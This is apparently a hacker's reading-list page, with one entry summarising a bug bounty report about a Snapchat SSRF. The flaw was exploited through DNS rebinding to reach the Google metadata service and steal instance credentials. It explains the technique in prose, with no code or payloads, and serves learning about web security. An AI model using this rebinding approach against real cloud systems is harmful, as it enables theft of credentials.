Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
Ben Sadeghipour (nahamsec)Posted 5 Years Ago- Snapchat had a SSRF vulnerability in an application that retrieved resources from a different location. This is the classic place to find a SSRF bug.
- The SSRF vulnerability was not trivial to exploit though. The page (being taken from Snapchat) loads the setup into a browser. Because this is in a browser, grabbing data across origin is NOT possible unless the CORS policy is setup in a janky way.
- DNS Rebinding is an attack that uses a small TTL (time to live) in order to change the IP associated with a domain. This is done by changing the IP of the current webpage to the internal network IP. Now, the loaded web page thinks that this internal IP is on the same origin!
- In order to access data on the internal network, DNS Rebinding was used. By changing the IP from the current webpage to the internal network IP of the Google Metadata service, it was possible to steal the credentials of the instance! It is fascinating to see the DNS Rebinding attack used in the wild.
